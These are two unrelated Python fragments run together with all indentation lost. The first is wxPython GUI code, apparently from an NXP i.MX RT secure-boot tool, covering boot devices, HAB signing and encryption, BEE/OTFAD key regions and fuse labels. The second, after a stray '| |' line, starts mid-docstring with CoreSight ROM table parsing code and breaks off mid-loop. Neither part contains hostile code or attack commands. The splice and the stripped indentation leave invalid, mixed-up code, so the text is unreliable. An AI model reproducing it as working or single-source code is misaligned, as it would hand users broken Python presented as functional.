def RTyyyy_setTargetSetupValue( self ):
self.showPageInMainBootSeqWin(uidef.kPageIndex_ImageGenerationSequence)
self.bootDevice = self.m_choice_bootDevice.GetString(self.m_choice_bootDevice.GetSelection())
self.RTyyyy_createMcuTarget()
self.refreshBootDeviceList()
self.bootDevice = self.m_choice_bootDevice.GetString(self.m_choice_bootDevice.GetSelection())
self.toolCommDict['bootDevice'] = self.m_choice_bootDevice.GetSelection()
if self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNor:
self.isXipableDevice = True
self.isNandDevice = False
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'flexspinor'
self.sbAccessBootDeviceMagic = ''
self._setFlexspiNorDeviceForEvkBoard()
elif self.bootDevice == RTyyyy_uidef.kBootDevice_SemcNor:
self.isXipableDevice = True
self.isNandDevice = False
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'semcnor'
self.sbAccessBootDeviceMagic = ''
elif self.bootDevice == RTyyyy_uidef.kBootDevice_LpspiNor:
self.isXipableDevice = False
self.isNandDevice = False
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'spieeprom'
self.sbAccessBootDeviceMagic = 'spieeprom'
elif self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNand:
self.isXipableDevice = False
self.isNandDevice = True
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'flexspinand'
self.sbAccessBootDeviceMagic = 'flexspinand'
elif self.bootDevice == RTyyyy_uidef.kBootDevice_SemcNand:
self.isXipableDevice = False
self.isNandDevice = True
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'semcnand'
self.sbAccessBootDeviceMagic = 'semcnand'
elif self.bootDevice == RTyyyy_uidef.kBootDevice_UsdhcSd:
self.isXipableDevice = False
self.isNandDevice = True
self.isSdmmcCard = True
self.sbEnableBootDeviceMagic = 'sdcard'
self.sbAccessBootDeviceMagic = 'sdcard'
elif self.bootDevice == RTyyyy_uidef.kBootDevice_UsdhcMmc:
self.isXipableDevice = False
self.isNandDevice = True
self.isSdmmcCard = True
self.sbEnableBootDeviceMagic = 'mmccard'
self.sbAccessBootDeviceMagic = 'mmccard'
else:
pass
def _RTyyyy_initSecureBootSeqValue( self ):
if not self.initSecureBootTypeList():
self.m_choice_secureBootType.Clear()
self.m_choice_secureBootType.SetItems(RTyyyy_uidef.kSecureBootType_Latest)
totalSel = self.m_choice_secureBootType.GetCount()
if self.toolCommDict['secBootType'] < totalSel:
self.m_choice_secureBootType.SetSelection(self.toolCommDict['secBootType'])
else:
self.m_choice_secureBootType.SetSelection(0)
self.m_textCtrl_serial.Clear()
self.m_textCtrl_serial.write(self.toolCommDict['certSerial'])
self.m_textCtrl_keyPass.Clear()
self.m_textCtrl_keyPass.write(self.toolCommDict['certKeyPass'])
if self.toolCommDict['appFilename'] != None:
self.m_filePicker_appPath.SetPath(self.toolCommDict['appFilename'])
self.m_choice_appFormat.SetSelection(self.toolCommDict['appFormat'])
self._setUserBinaryBaseField()
self.m_textCtrl_appBaseAddr.Clear()
self.m_textCtrl_appBaseAddr.write(self.toolCommDict['appBinBaseAddr'])
self.m_choice_keyStorageRegion.SetSelection(self.toolCommDict['keyStoreRegion'])
self.m_choice_enableCertForHwCrypto.SetSelection(self.toolCommDict['certOptForHwCrypto'])
def _RTyyyy_initSecureBootSeqColor ( self ):
self.secureBootType = self.m_choice_secureBootType.GetString(self.m_choice_secureBootType.GetSelection())
self.keyStorageRegion = self.m_choice_keyStorageRegion.GetString(self.m_choice_keyStorageRegion.GetSelection())
self.RTyyyy_setSecureBootSeqColor()
def RTyyyy_setSecureBootButtonColor( self, needToPlaySound=True ):
activeColor = None
optionalColor = None
setEnable = None
if self.isToolRunAsEntryMode:
activeColor = uidef.kBootSeqColor_Invalid
optionalColor = uidef.kBootSeqColor_Invalid
else:
activeColor = uidef.kBootSeqColor_Active
optionalColor = uidef.kBootSeqColor_Optional
setEnable = not self.isToolRunAsEntryMode
self.secureBootType = self.m_choice_secureBootType.GetString(self.m_choice_secureBootType.GetSelection())
if self.secureBootType == RTyyyy_uidef.kSecureBootType_Development:
self.m_button_genImage.Enable( setEnable )
self.m_button_genImage.SetBackgroundColour( activeColor )
self.m_button_flashImage.Enable( setEnable )
self.m_button_flashImage.SetBackgroundColour( activeColor )
elif self.secureBootType == RTyyyy_uidef.kSecureBootType_HabAuth:
self.m_button_genCert.Enable( setEnable )
self.m_button_genCert.SetBackgroundColour( activeColor )
self.m_button_genImage.Enable( setEnable )
self.m_button_genImage.SetBackgroundColour( activeColor )
self.m_button_progSrk.Enable( setEnable )
self.m_button_progSrk.SetBackgroundColour( activeColor )
self.m_button_flashImage.Enable( setEnable )
self.m_button_flashImage.SetBackgroundColour( activeColor )
elif self.secureBootType == RTyyyy_uidef.kSecureBootType_HabCrypto:
if (self.bootDevice != RTyyyy_uidef.kBootDevice_FlexspiNor and self.bootDevice != RTyyyy_uidef.kBootDevice_SemcNor) or \
self.tgt.isNonXipImageAppliableForXipableDeviceUnderClosedHab:
self.m_button_genCert.Enable( setEnable )
self.m_button_genCert.SetBackgroundColour( activeColor )
self.m_button_genImage.Enable( setEnable )
self.m_button_genImage.SetBackgroundColour( activeColor )
self.m_button_progSrk.Enable( setEnable )
self.m_button_progSrk.SetBackgroundColour( activeColor )
self.m_button_flashImage.Enable( setEnable )
self.m_button_flashImage.SetBackgroundColour( activeColor )
self.m_button_progDek.Enable( setEnable )
self.m_button_progDek.SetBackgroundColour( activeColor )
elif self.secureBootType in RTyyyy_uidef.kSecureBootType_HwCrypto:
if self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNor:
if self.isCertEnabledForHwCrypto:
self.m_button_genCert.Enable( setEnable )
self.m_button_genCert.SetBackgroundColour( optionalColor )
self.m_button_progSrk.Enable( setEnable )
self.m_button_progSrk.SetBackgroundColour( optionalColor )
if self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FixedOtpmkKey:
self.m_button_prepHwCrypto.Enable( setEnable )
self.m_button_prepHwCrypto.SetBackgroundColour( activeColor )
elif self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FlexibleUserKeys:
self.m_button_prepHwCrypto.Enable( setEnable )
self.m_button_prepHwCrypto.SetBackgroundColour( activeColor )
self.m_button_operHwCrypto.Enable( setEnable )
self.m_button_operHwCrypto.SetBackgroundColour( activeColor )
userKeyCtrlDict, userKeyCmdDict = uivar.getAdvancedSettings(uidef.kAdvancedSettings_UserKeys)
if self.secureBootType == RTyyyy_uidef.kSecureBootType_BeeCrypto:
userKeyCmdDict['hw_eng'] = 'bee'
elif self.secureBootType == RTyyyy_uidef.kSecureBootType_OtfadCrypto:
userKeyCmdDict['hw_eng'] = 'otfad'
else:
pass
uivar.setAdvancedSettings(uidef.kAdvancedSettings_UserKeys, userKeyCtrlDict, userKeyCmdDict)
else:
pass
self.m_button_genImage.Enable( setEnable )
self.m_button_genImage.SetBackgroundColour( activeColor )
self.m_button_flashImage.Enable( setEnable )
self.m_button_flashImage.SetBackgroundColour( activeColor )
else:
pass
self.m_button_allInOneAction.Enable( True )
self.m_button_allInOneAction.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.Refresh()
if needToPlaySound:
self.soundEffectFilenameForTask = uidef.kSoundEffectFilename_Restart
def _RTyyyy_getImgName( self ):
memType = ''
hasDcd = ''
if self.isNandDevice:
if self.isSdmmcCard:
memType = 'sdmmc_'
else:
memType = 'nand_'
else:
memType = 'nor_'
dcdCtrlDict, dcdSettingsDict = uivar.getBootDeviceConfiguration(RTyyyy_uidef.kBootDevice_Dcd)
if dcdCtrlDict['isDcdEnabled']:
hasDcd = 'dcd_'
return memType, hasDcd
def RTyyyy_setSecureBootSeqColor( self , needToPlaySound=True ):
self.hasDynamicLableBeenInit = True
self.showPageInMainBootSeqWin(uidef.kPageIndex_ImageGenerationSequence)
self.secureBootType = self.m_choice_secureBootType.GetString(self.m_choice_secureBootType.GetSelection())
self.refreshSecureBootTypeList()
self.toolCommDict['secBootType'] = self.m_choice_secureBootType.GetSelection()
self.secureBootType = self.m_choice_secureBootType.GetString(self.m_choice_secureBootType.GetSelection())
self.resetSecureBootSeqColor()
self.m_button_genCert.SetLabel(uilang.kMainLanguageContentDict['button_genCert'][self.languageIndex])
self.m_button_progSrk.SetLabel(uilang.kMainLanguageContentDict['button_progSrk'][self.languageIndex])
self.m_button_operHwCrypto.SetLabel(uilang.kMainLanguageContentDict['button_operHwCrypto'][self.languageIndex])
self.m_button_progDek.SetLabel(uilang.kMainLanguageContentDict['button_progDek'][self.languageIndex])
if self.secureBootType == RTyyyy_uidef.kSecureBootType_Development:
self.m_panel_genImage1_browseApp.Enable( True )
self.m_panel_genImage1_browseApp.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_u'][self.languageIndex])
self.m_panel_flashImage1_showImage.Enable( True )
self.m_panel_flashImage1_showImage.SetBackgroundColour( uidef.kBootSeqColor_Active )
strMemType, strHasDcd = self._RTyyyy_getImgName()
imgPath = "../img/RT10yy/" + strMemType + "image_" + strHasDcd + "unsigned.png"
self.showImageLayout(imgPath.encode('utf-8'))
self.m_button_flashImage.SetLabel(uilang.kMainLanguageContentDict['button_flashImage_u'][self.languageIndex])
elif self.secureBootType == RTyyyy_uidef.kSecureBootType_HabAuth:
self.m_panel_doAuth1_certInput.Enable( True )
self.m_panel_doAuth1_certInput.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_textCtrl_serial.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_textCtrl_keyPass.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_panel_doAuth2_certFmt.Enable( True )
self.m_panel_doAuth2_certFmt.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_genImage1_browseApp.Enable( True )
self.m_panel_genImage1_browseApp.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_s'][self.languageIndex])
self.m_panel_progSrk1_showSrk.Enable( True )
self.m_panel_progSrk1_showSrk.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_flashImage1_showImage.Enable( True )
self.m_panel_flashImage1_showImage.SetBackgroundColour( uidef.kBootSeqColor_Active )
strMemType, strHasDcd = self._RTyyyy_getImgName()
imgPath = "../img/RT10yy/" + strMemType + "image_" + strHasDcd + "signed.png"
self.showImageLayout(imgPath.encode('utf-8'))
self.m_button_flashImage.SetLabel(uilang.kMainLanguageContentDict['button_flashImage_s'][self.languageIndex])
elif self.secureBootType == RTyyyy_uidef.kSecureBootType_HabCrypto:
if (self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNor or self.bootDevice == RTyyyy_uidef.kBootDevice_SemcNor) and \
(not self.tgt.isNonXipImageAppliableForXipableDeviceUnderClosedHab):
self.resetSecureBootSeqColor()
else:
self.m_panel_doAuth1_certInput.Enable( True )
self.m_panel_doAuth1_certInput.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_textCtrl_serial.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_textCtrl_keyPass.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_panel_doAuth2_certFmt.Enable( True )
self.m_panel_doAuth2_certFmt.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_genImage1_browseApp.Enable( True )
self.m_panel_genImage1_browseApp.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_genImage2_habCryptoAlgo.Enable( True )
self.m_panel_genImage2_habCryptoAlgo.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_se'][self.languageIndex])
self.m_panel_progSrk1_showSrk.Enable( True )
self.m_panel_progSrk1_showSrk.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_flashImage1_showImage.Enable( True )
self.m_panel_flashImage1_showImage.SetBackgroundColour( uidef.kBootSeqColor_Active )
strMemType, strHasDcd = self._RTyyyy_getImgName()
imgPath = "../img/RT10yy/" + strMemType + "image_" + strHasDcd + "signed_hab_encrypted_nodek.png"
self.showImageLayout(imgPath.encode('utf-8'))
self.m_button_flashImage.SetLabel(uilang.kMainLanguageContentDict['button_flashImage_e'][self.languageIndex])
self.m_panel_progDek1_showHabDek.Enable( True )
self.m_panel_progDek1_showHabDek.SetBackgroundColour( uidef.kBootSeqColor_Active )
elif self.secureBootType in RTyyyy_uidef.kSecureBootType_HwCrypto:
if self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNor:
self.m_panel_genImage1_browseApp.Enable( True )
self.m_panel_genImage1_browseApp.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_genImage3_enableCertForHwCrypto.Enable( True )
self.m_panel_genImage3_enableCertForHwCrypto.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.setKeyStorageRegionColor()
self.setHwCryptoCertColor()
self.m_panel_flashImage1_showImage.Enable( True )
self.m_panel_flashImage1_showImage.SetBackgroundColour( uidef.kBootSeqColor_Active )
else:
self.resetSecureBootSeqColor()
else:
pass
self.RTyyyy_setSecureBootButtonColor(needToPlaySound)
self.Refresh()
def updateImgPictureAfterFlashDek( self ):
strMemType, strHasDcd = self._RTyyyy_getImgName()
imgPath = "../img/RT10yy/" + strMemType + "image_" + strHasDcd + "signed_hab_encrypted.png"
self.showImageLayout(imgPath.encode('utf-8'))
def getSerialAndKeypassContent( self ):
serialContent = self.m_textCtrl_serial.GetLineText(0)
keypassContent = self.m_textCtrl_keyPass.GetLineText(0)
self.toolCommDict['certSerial'] = serialContent
self.toolCommDict['certKeyPass'] = keypassContent
return serialContent, keypassContent
def setHwCryptoCertColor( self ):
txt = self.m_choice_enableCertForHwCrypto.GetString(self.m_choice_enableCertForHwCrypto.GetSelection())
self.toolCommDict['certOptForHwCrypto'] = self.m_choice_enableCertForHwCrypto.GetSelection()
strMemType, strHasDcd = self._RTyyyy_getImgName()
imgPath = ""
strHwCryptoType = ""
if self.secureBootType == RTyyyy_uidef.kSecureBootType_BeeCrypto:
strHwCryptoType = 'bee'
elif self.secureBootType == RTyyyy_uidef.kSecureBootType_OtfadCrypto:
strHwCryptoType = 'otfad'
else:
pass
if txt == 'No':
self.isCertEnabledForHwCrypto = False
self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_u'][self.languageIndex])
imgPath = "../img/RT10yy/nor_image_" + strHasDcd + "unsigned_" + strHwCryptoType + "_encrypted.png"
elif txt == 'Yes':
self.isCertEnabledForHwCrypto = True
self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_s'][self.languageIndex])
imgPath = "../img/RT10yy/nor_image_" + strHasDcd + "signed_" + strHwCryptoType + "_encrypted.png"
else:
pass
self.showImageLayout(imgPath.encode('utf-8'))
self.m_button_flashImage.SetLabel(uilang.kMainLanguageContentDict['button_flashImage_e'][self.languageIndex])
self.resetCertificateColor()
if self.isCertEnabledForHwCrypto:
activeColor = None
if self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FixedOtpmkKey:
activeColor = uidef.kBootSeqColor_Active
elif self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FlexibleUserKeys:
activeColor = uidef.kBootSeqColor_Optional
else:
pass
self.m_panel_doAuth1_certInput.Enable( True )
self.m_panel_doAuth1_certInput.SetBackgroundColour( activeColor )
self.m_textCtrl_serial.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_textCtrl_keyPass.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_panel_doAuth2_certFmt.Enable( True )
self.m_panel_doAuth2_certFmt.SetBackgroundColour( activeColor )
self.m_button_genCert.Enable( True )
self.m_button_genCert.SetBackgroundColour( activeColor )
self.m_panel_progSrk1_showSrk.Enable( True )
self.m_panel_progSrk1_showSrk.SetBackgroundColour( activeColor )
self.m_button_progSrk.Enable( True )
self.m_button_progSrk.SetBackgroundColour( activeColor )
self.Refresh()
def setKeyStorageRegionColor( self ):
self.keyStorageRegion = self.m_choice_keyStorageRegion.GetString(self.m_choice_keyStorageRegion.GetSelection())
self.toolCommDict['keyStoreRegion'] = self.m_choice_keyStorageRegion.GetSelection()
self.resetKeyStorageRegionColor()
self.m_panel_prepHwCrypto1_hwCryptoKeyRegion.Enable( True )
self.m_panel_prepHwCrypto1_hwCryptoKeyRegion.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_prepHwCrypto2_hwCryptoAlgo.Enable( True )
self.m_panel_prepHwCrypto2_hwCryptoAlgo.SetBackgroundColour( uidef.kBootSeqColor_Active )
if self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FixedOtpmkKey:
self.m_choice_enableCertForHwCrypto.Clear()
self.m_choice_enableCertForHwCrypto.SetItems(['Yes'])
self.m_choice_enableCertForHwCrypto.SetSelection(0)
self.setHwCryptoCertColor()
self.m_choice_availHwCryptoEngines.Clear()
self.m_choice_availHwCryptoEngines.SetItems(['1'])
self.m_choice_availHwCryptoEngines.SetSelection(0)
self.m_button_prepHwCrypto.Enable( True )
self.m_button_prepHwCrypto.SetLabel(uilang.kMainLanguageContentDict['button_prepHwCrypto_p'][self.languageIndex])
self.m_button_prepHwCrypto.SetBackgroundColour( uidef.kBootSeqColor_Active )
elif self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FlexibleUserKeys:
enableCertForHwCryptoTxt = self.m_choice_enableCertForHwCrypto.GetString(self.m_choice_enableCertForHwCrypto.GetSelection())
self.m_choice_enableCertForHwCrypto.Clear()
self.m_choice_enableCertForHwCrypto.SetItems(['No', 'Yes'])
self.m_choice_enableCertForHwCrypto.SetSelection(self.m_choice_enableCertForHwCrypto.FindString(enableCertForHwCryptoTxt))
self.setHwCryptoCertColor()
self.m_choice_availHwCryptoEngines.Clear()
if self.secureBootType == RTyyyy_uidef.kSecureBootType_BeeCrypto:
self.m_choice_availHwCryptoEngines.SetItems([str(RTyyyy_uidef.kMaxHwCryptoCount_Bee)])
elif self.secureBootType == RTyyyy_uidef.kSecureBootType_OtfadCrypto:
self.m_choice_availHwCryptoEngines.SetItems([str(RTyyyy_uidef.kMaxHwCryptoCount_Otfad)])
else:
pass
self.m_choice_availHwCryptoEngines.SetSelection(0)
self.m_button_prepHwCrypto.Enable( True )
self.m_button_prepHwCrypto.SetLabel(uilang.kMainLanguageContentDict['button_prepHwCrypto_e'][self.languageIndex])
self.m_button_prepHwCrypto.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_operHwCrypto1_hwCryptoKeyInfo.Enable( True )
self.m_panel_operHwCrypto1_hwCryptoKeyInfo.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_operHwCrypto2_showGp4Dek.Enable( True )
self.m_panel_operHwCrypto2_showGp4Dek.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_panel_operHwCrypto3_showSwgp2Dek.Enable( True )
self.m_panel_operHwCrypto3_showSwgp2Dek.SetBackgroundColour( uidef.kBootSeqColor_Active )
self.m_button_operHwCrypto.Enable( True )
self.m_button_operHwCrypto.SetBackgroundColour( uidef.kBootSeqColor_Active )
else:
pass
self.m_choice_maxFacCnt.Clear()
if self.secureBootType == RTyyyy_uidef.kSecureBootType_BeeCrypto:
self.m_choice_maxFacCnt.SetItems([str(RTyyyy_uidef.kMaxFacRegionCount_Bee)])
elif self.secureBootType == RTyyyy_uidef.kSecureBootType_OtfadCrypto:
self.m_choice_maxFacCnt.SetItems([str(RTyyyy_uidef.kMaxFacRegionCount_Otfad)])
else:
pass
self.m_choice_maxFacCnt.SetSelection(0)
self.Refresh()
def printSrkData( self, srkStr ):
self.m_textCtrl_srk256bit.write(srkStr + "\n")
def clearSrkData( self ):
self.m_textCtrl_srk256bit.Clear()
def printHabDekData( self, dekStr ):
self.m_textCtrl_habDek128bit.write(dekStr + "\n")
def clearHabDekData( self ):
self.m_textCtrl_habDek128bit.Clear()
def printOtpmkDekData( self, dekStr ):
#self.m_textCtrl_otpmkDek128bit.write(dekStr + "\n")
pass
def clearOtpmkDekData( self ):
#self.m_textCtrl_otpmkDek128bit.Clear()
pass
def printGp4DekData( self, dekStr ):
self.m_textCtrl_gp4Dek128bit.write(dekStr + "\n")
def clearGp4DekData( self ):
self.m_textCtrl_gp4Dek128bit.Clear()
def printSwGp2DekData( self, dekStr ):
self.m_textCtrl_swgp2Dek128bit.write(dekStr + "\n")
def clearSwGp2DekData( self ):
self.m_textCtrl_swgp2Dek128bit.Clear()
def updateFuseGroupText( self ):
self.clearUserFuses()
if self.mcuSeries == uidef.kMcuSeries_iMXRT10yy:
self.m_button_fuse400.SetLabel('Lock')
self.m_staticText_fuse410.SetLabel('UUID0')
self.m_staticText_fuse420.SetLabel('UUID1')
self.m_staticText_fuse430.SetLabel('0x430')
self.m_staticText_fuse440.SetLabel('0x440')
self.m_button_fuse450.SetLabel('Cfg0')
self.m_button_fuse460.SetLabel('Cfg1')
self.m_button_fuse470.SetLabel('Cfg2')
self.m_staticText_fuse480.SetLabel('0x480')
self.m_staticText_fuse490.SetLabel('0x490')
self.m_staticText_fuse4a0.SetLabel('0x4a0')
self.m_staticText_fuse4b0.SetLabel('0x4b0')
self.m_staticText_fuse4c0.SetLabel('0x4c0')
self.m_staticText_fuse4d0.SetLabel('0x4d0')
| |
a CoreSightComponentID instance.
@param filter Optional filter callable. Must accept a CoreSightComponentID instance and
return a boolean indicating whether to perform the action (True applies action).
"""
for component in self._components:
# Recurse into child ROM tables.
if isinstance(component, ROMTable):
component.for_each(action, filter)
continue
# Skip component if the filter returns False.
if filter is not None and not filter(component):
continue
# Perform the action.
action(component)
class Class1ROMTable(ROMTable):
"""! @brief CoreSight Class 0x1 ROM table component and parser.
An object of this class represents a CoreSight Class 0x1 ROM table. It supports reading the table
and any child tables. For each entry in the table, a CoreSightComponentID object is created
that further reads the component's CoreSight identification registers.
Granular Power Requestor (GPR) components are supported to automatically enable power domains
required to access components, as indicated by the component entry in the ROM table.
"""
# Constants for Class 0x1 ROM tables.
ROM_TABLE_ENTRY_PRESENT_MASK = 0x1
# Mask for ROM table entry size. 1 if 32-bit entries.
ROM_TABLE_32BIT_FORMAT_MASK = 0x2
# ROM table entry power ID fields.
ROM_TABLE_POWERIDVALID_MASK = 0x4
ROM_TABLE_POWERID_MASK = 0x01f0
ROM_TABLE_POWERID_SHIFT = 4
# 2's complement offset to debug component from ROM table base address.
ROM_TABLE_ADDR_OFFSET_NEG_MASK = 0x80000000
ROM_TABLE_ADDR_OFFSET_MASK = 0xfffff000
ROM_TABLE_MAX_ENTRIES = 960
def _read_table(self):
entryAddress = self.address
foundEnd = False
entriesRead = 0
entryNumber = 0
while not foundEnd and entriesRead < self.ROM_TABLE_MAX_ENTRIES:
# Read several entries at a time for performance.
readCount = min(self.ROM_TABLE_MAX_ENTRIES - entriesRead, self.ROM_TABLE_ENTRY_READ_COUNT)
entries = self.ap.read_memory_block32(entryAddress, readCount)
entriesRead += readCount
for entry in entries:
# Zero entry indicates the end of the table.
if entry == 0:
foundEnd = True
break
try:
self._handle_table_entry(entry, entryNumber)
except exceptions.TransferError as err:
LOG.error("Error attempting to probe CoreSight component referenced by "
"ROM table entry #%d: %s", entryNumber, err,
exc_info=self.session.get_current().log_tracebacks)
entryAddress += 4
entryNumber += 1
def _power_component(self, number, powerid, entry):
if self.gpr is None:
LOG.warning("ROM table entry #%d specifies power ID #%d, but no power requestor "
"component has been seen; skipping component (entry=0x%08x)",
number, powerid, entry)
return False
# Power up the domain.
if not self.gpr.power_up_one(powerid):
LOG.error("Failed to power up power domain #%d", powerid)
return False
else:
LOG.info("Enabled power to power domain #%d", powerid)
return True
def _handle_table_entry(self, entry, number):
# Nonzero entries can still be disabled, so check the present bit before handling.
if (entry & self.ROM_TABLE_ENTRY_PRESENT_MASK) == 0:
return
# Verify the entry format is 32-bit.
if (entry & self.ROM_TABLE_32BIT_FORMAT_MASK) == 0:
return
# Get the component's top 4k address.
offset = entry & self.ROM_TABLE_ADDR_OFFSET_MASK
if (entry & self.ROM_TABLE_ADDR_OFFSET_NEG_MASK) != 0:
offset = ~bit_invert(offset)
address = self.address + offset
# Check power ID.
if (entry & self.ROM_TABLE_POWERIDVALID_MASK) != 0:
powerid = (entry & self.ROM_TABLE_POWERID_MASK) >> self.ROM_TABLE_POWERID_SHIFT
# Attempt to power up this component. Skip this component if we the attempt fails.
if not self._power_component(number, powerid, entry):
return
else:
powerid = None
# Create component instance.
cmpid = CoreSightComponentID(self, self.ap, address, powerid)
cmpid.read_id_registers()
# Is this component a power requestor?
if cmpid.factory == GPR.factory:
# Create the GPR instance and stash it.
self.gpr = cmpid.factory(self.ap, cmpid, None)
self.gpr.init()
LOG.info("%s[%d]%s", self.depth_indent, number, str(cmpid))
# Recurse into child ROM tables.
if cmpid.is_rom_table:
cmp = ROMTable.create(self.ap, cmpid, address, parent_table=self)
cmp.init()
else:
cmp = cmpid
if cmp is not None:
self.components.append(cmp)
class Class9ROMTable(ROMTable):
"""! @brief CoreSight Class 0x9 ROM table component and parser.
Handles parsing of class 0x9 ROM tables as defined in ADIv6.
In addition to GPR (Granular Power Requestor) components for power domain management, this class
supports the optional power request functionality present in class 0x9 ROM tables.
"""
# Constants for Class 0x9 ROM tables.
ROM_TABLE_ENTRY_PRESENT_MASK = 0x3
ROM_TABLE_ENTRY_POWERIDVALID_MASK = 0x4
ROM_TABLE_ENTRY_POWERID_MASK = 0x01f0
ROM_TABLE_ENTRY_POWERID_SHIFT = 4
ROM_TABLE_ENTRY_NOT_PRESENT_FINAL = 0x0
ROM_TABLE_ENTRY_NOT_PRESENT_NOT_FINAL = 0x2
ROM_TABLE_ENTRY_PRESENT = 0x3
ROM_TABLE_DBGPCRn = 0xa00
ROM_TABLE_DBGPSRn = 0xa80
ROM_TABLE_SYSPCRn = 0xb00
ROM_TABLE_SYSPSRn = 0xb80
ROM_TABLE_PRIDR0 = 0xc00
ROM_TABLE_DBGRSTRR = 0xc10
ROM_TABLE_DBGRSTAR = 0xc14
ROM_TABLE_SYSRSTRR = 0xc18
ROM_TABLE_SYSRSTAR = 0xc1c
ROM_TABLE_AUTHSTATUS = 0xfb8
ROM_TABLE_DBGPCRn_PRESENT_MASK = 0x00000001
ROM_TABLE_DBGPCRn_PR_MASK = 0x00000002
ROM_TABLE_DBGPSRn_PS_MASK = 0x00000003
ROM_TABLE_DBGPSRn_PS_MAYBE_NOT_POWERED = 0x0
ROM_TABLE_DBGPSRn_PS_IS_POWERED = 0x1
ROM_TABLE_DBGPSRn_PS_MUST_REMAIN_POWERED = 0x3
ROM_TABLE_PRIDR0_VERSION_MASK = 0x0000000f
ROM_TABLE_PRIDR0_VERSION = 1 # Current version number of the power request functionality.
ROM_TABLE_DEVID_CP_MASK = 0x00000040
ROM_TABLE_DEVID_PRR_MASK = 0x00000020
ROM_TABLE_DEVID_SYSMEM_MASK = 0x00000010
ROM_TABLE_DEVID_FORMAT_MASK = 0x0000000f
ROM_TABLE_FORMAT_32BIT = 0x0
ROM_TABLE_FORMAT_64BIT = 0x1
ROM_TABLE_MAX_ENTRIES = 512 # Maximum 32-bit entries.
# 2's complement offset to debug component from ROM table base address.
ROM_TABLE_ADDR_OFFSET_NEG_MASK = { 32: (1 << 31), 64: (1 << 63) }
ROM_TABLE_ADDR_OFFSET_MASK = { 32: 0xfffff000, 64: 0xfffffffffffff000 }
# 5 second timeout on power domain requests.
POWER_REQUEST_TIMEOUT = 5.0
def __init__(self, ap, cmpid=None, addr=None, parent_table=None):
"""! @brief Component constructor."""
super(Class9ROMTable, self).__init__(ap, cmpid, addr, parent_table)
self._pridr_version = None
# Extract flags from DEVID.
self._has_com_port = ((self.cmpid.devid[0] & self.ROM_TABLE_DEVID_CP_MASK) != 0)
self._has_prr = ((self.cmpid.devid[0] & self.ROM_TABLE_DEVID_PRR_MASK) != 0)
self._is_sysmem = ((self.cmpid.devid[0] & self.ROM_TABLE_DEVID_SYSMEM_MASK) != 0)
is_64bit = ((self.cmpid.devid[0] & self.ROM_TABLE_DEVID_FORMAT_MASK) != 0)
self._width = 64 if is_64bit else 32
LOG.debug("cp=%d prr=%d sysmem=%d w=%d", self._has_com_port, self._has_prr, self._is_sysmem, self._width)
@property
def has_com_port(self):
"""! @brief Whether the ROM table includes COM Port functionality."""
return self._has_com_port
@property
def has_prr(self):
"""! @brief Whether the ROM table includes power and reset requesting functionality."""
return self._has_prr
@property
def is_sysmem(self):
"""! @brief Whether the ROM table is present in system memory."""
return self._is_sysmem
def _read_table(self):
"""! @brief Reads and parses the ROM table."""
# Compute multipliers for 32- or 64-bit.
entrySizeMultiplier = self._width // 32
actualMaxEntries = self.ROM_TABLE_MAX_ENTRIES // entrySizeMultiplier
# Ensure 64-bit format is read as pairs of 32-bit values.
entryReadCount = align_down(self.ROM_TABLE_ENTRY_READ_COUNT, entrySizeMultiplier)
entryAddress = self.address
foundEnd = False
entriesRead = 0
entryNumber = 0
while not foundEnd and entriesRead < actualMaxEntries:
# Read several entries at a time for performance.
readCount = min(actualMaxEntries - entriesRead, entryReadCount)
entries = self.ap.read_memory_block32(entryAddress, readCount)
entriesRead += readCount
# For 64-bit entries, combine pairs of 32-bit values into single 64-bit value.
if self._width == 64:
entries = [(lo | (hi << 32)) for lo, hi in pairwise(entries)]
for entry in entries:
present = entry & self.ROM_TABLE_ENTRY_PRESENT_MASK
